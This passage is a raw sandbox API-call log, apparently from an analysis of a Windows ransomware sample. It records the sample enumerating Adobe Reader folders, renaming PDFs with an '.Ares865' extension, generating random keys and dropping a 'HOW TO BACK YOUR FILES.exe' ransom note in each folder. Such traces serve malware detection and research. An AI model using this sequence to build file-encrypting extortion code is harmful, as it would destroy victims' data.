Flags=0x0, Size=0x13) returned 0x2e7c28 [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321700 [0173.556] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0173.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c1afe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c1afe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ITA", cAlternateFileName="")) returned 1 [0173.556] lstrcmpiW (lpString1="ITA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.556] lstrcmpiW (lpString1="ITA", lpString2="aoldtz.exe") returned 1 [0173.556] lstrcpyW (in: lpString1=0x2cce498, lpString2="ITA" | out: lpString1="ITA") returned="ITA" [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3217a8 [0173.556] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0173.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c1afe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c1afe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JPN", cAlternateFileName="")) returned 1 [0173.556] lstrcmpiW (lpString1="JPN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.556] lstrcmpiW (lpString1="JPN", lpString2="aoldtz.exe") returned 1 [0173.556] lstrcpyW (in: lpString1=0x2cce498, lpString2="JPN" | out: lpString1="JPN") returned="JPN" [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321850 [0173.556] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0173.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bf4e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bf4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KOR", cAlternateFileName="")) returned 1 [0173.556] lstrcmpiW (lpString1="KOR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.557] lstrcmpiW (lpString1="KOR", lpString2="aoldtz.exe") returned 1 [0173.557] lstrcpyW (in: lpString1=0x2cce498, lpString2="KOR" | out: lpString1="KOR") returned="KOR" [0173.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0173.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3218f8 [0173.557] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0173.557] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bf4e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bf4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLD", cAlternateFileName="")) returned 1 [0173.557] lstrcmpiW (lpString1="NLD", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.557] lstrcmpiW (lpString1="NLD", lpString2="aoldtz.exe") returned 1 [0173.557] lstrcpyW (in: lpString1=0x2cce498, lpString2="NLD" | out: lpString1="NLD") returned="NLD" [0173.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0173.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3219a0 [0173.557] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0173.557] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bced20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bced20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NOR", cAlternateFileName="")) returned 1 [0173.557] lstrcmpiW (lpString1="NOR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.557] lstrcmpiW (lpString1="NOR", lpString2="aoldtz.exe") returned 1 [0173.557] lstrcpyW (in: lpString1=0x2cce498, lpString2="NOR" | out: lpString1="NOR") returned="NOR" [0173.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0173.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321a48 [0173.558] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0173.558] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806bec20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54bced20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54bced20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="POL", cAlternateFileName="")) returned 1 [0173.558] lstrcmpiW (lpString1="POL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.558] lstrcmpiW (lpString1="POL", lpString2="aoldtz.exe") returned 1 [0173.558] lstrcpyW (in: lpString1=0x2cce498, lpString2="POL" | out: lpString1="POL") returned="POL" [0173.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0173.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321af0 [0173.558] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0173.558] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff748c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ba8bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ba8bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PTB", cAlternateFileName="")) returned 1 [0173.558] lstrcmpiW (lpString1="PTB", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.558] lstrcmpiW (lpString1="PTB", lpString2="aoldtz.exe") returned 1 [0173.558] lstrcpyW (in: lpString1=0x2cce498, lpString2="PTB" | out: lpString1="PTB") returned="PTB" [0173.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0173.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321b98 [0173.558] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0173.558] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80698ac0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54ba8bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54ba8bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUM", cAlternateFileName="")) returned 1 [0173.558] lstrcmpiW (lpString1="RUM", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.558] lstrcmpiW (lpString1="RUM", lpString2="aoldtz.exe") returned 1 [0173.559] lstrcpyW (in: lpString1=0x2cce498, lpString2="RUM" | out: lpString1="RUM") returned="RUM" [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321c40 [0173.559] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0173.559] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80672960, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b82a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b82a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUS", cAlternateFileName="")) returned 1 [0173.559] lstrcmpiW (lpString1="RUS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.559] lstrcmpiW (lpString1="RUS", lpString2="aoldtz.exe") returned 1 [0173.559] lstrcpyW (in: lpString1=0x2cce498, lpString2="RUS" | out: lpString1="RUS") returned="RUS" [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321ce8 [0173.559] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0173.559] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b82a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b82a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SKY", cAlternateFileName="")) returned 1 [0173.559] lstrcmpiW (lpString1="SKY", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.559] lstrcmpiW (lpString1="SKY", lpString2="aoldtz.exe") returned 1 [0173.559] lstrcpyW (in: lpString1=0x2cce498, lpString2="SKY" | out: lpString1="SKY") returned="SKY" [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0173.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321d90 [0173.559] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0173.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b5c900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b5c900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SLV", cAlternateFileName="")) returned 1 [0173.560] lstrcmpiW (lpString1="SLV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.560] lstrcmpiW (lpString1="SLV", lpString2="aoldtz.exe") returned 1 [0173.560] lstrcpyW (in: lpString1=0x2cce498, lpString2="SLV" | out: lpString1="SLV") returned="SLV" [0173.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0173.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321e38 [0173.560] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0173.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SUO", cAlternateFileName="")) returned 1 [0173.560] lstrcmpiW (lpString1="SUO", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.560] lstrcmpiW (lpString1="SUO", lpString2="aoldtz.exe") returned 1 [0173.560] lstrcpyW (in: lpString1=0x2cce498, lpString2="SUO" | out: lpString1="SUO") returned="SUO" [0173.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0173.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321ee0 [0173.560] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0173.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVE", cAlternateFileName="")) returned 1 [0173.560] lstrcmpiW (lpString1="SVE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.560] lstrcmpiW (lpString1="SVE", lpString2="aoldtz.exe") returned 1 [0173.561] lstrcpyW (in: lpString1=0x2cce498, lpString2="SVE" | out: lpString1="SVE") returned="SVE" [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321f88 [0173.561] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0173.561] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806266a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a9e220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a9e220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TUR", cAlternateFileName="")) returned 1 [0173.561] lstrcmpiW (lpString1="TUR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.561] lstrcmpiW (lpString1="TUR", lpString2="aoldtz.exe") returned 1 [0173.561] lstrcpyW (in: lpString1=0x2cce498, lpString2="TUR" | out: lpString1="TUR") returned="TUR" [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x322030 [0173.561] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0173.561] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80600540, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a51f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a51f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKR", cAlternateFileName="")) returned 1 [0173.561] lstrcmpiW (lpString1="UKR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.561] lstrcmpiW (lpString1="UKR", lpString2="aoldtz.exe") returned 1 [0173.561] lstrcpyW (in: lpString1=0x2cce498, lpString2="UKR" | out: lpString1="UKR") returned="UKR" [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0173.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3220d8 [0173.561] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0173.561] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe69f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b772, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Words.pdf", cAlternateFileName="")) returned 1 [0173.561] lstrcmpiW (lpString1="Words.pdf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.561] lstrcmpiW (lpString1="Words.pdf", lpString2="aoldtz.exe") returned 1 [0173.562] lstrcpyW (in: lpString1=0x2cce498, lpString2="Words.pdf" | out: lpString1="Words.pdf") returned="Words.pdf" [0173.562] lstrlenW (lpString="Words.pdf") returned 9 [0173.562] lstrlenW (lpString="Ares865") returned 7 [0173.562] lstrcmpiW (lpString1="rds.pdf", lpString2="Ares865") returned 1 [0173.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf.Ares865") returned 93 [0173.562] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf.ares865"), dwFlags=0x1) returned 1 [0173.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=112498) returned 1 [0173.564] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.574] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.574] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.574] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.576] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" [0173.577] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR" [0173.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.580] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.581] GetLastError () returned 0x0 [0173.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.581] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80600540, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a51f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a51f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.582] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.582] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.582] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Dynamic.pdf" | out: lpString1="Dynamic.pdf") returned="Dynamic.pdf" [0173.582] lstrlenW (lpString="Dynamic.pdf") returned 11 [0173.582] lstrlenW (lpString="Ares865") returned 7 [0173.582] lstrcmpiW (lpString1="mic.pdf", lpString2="Ares865") returned 1 [0173.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf.Ares865") returned 99 [0173.583] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf.ares865"), dwFlags=0x1) returned 1 [0173.585] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101141) returned 1 [0173.586] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.594] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.594] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.595] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Faces.pdf" | out: lpString1="Faces.pdf") returned="Faces.pdf" [0173.596] lstrlenW (lpString="Faces.pdf") returned 9 [0173.596] lstrlenW (lpString="Ares865") returned 7 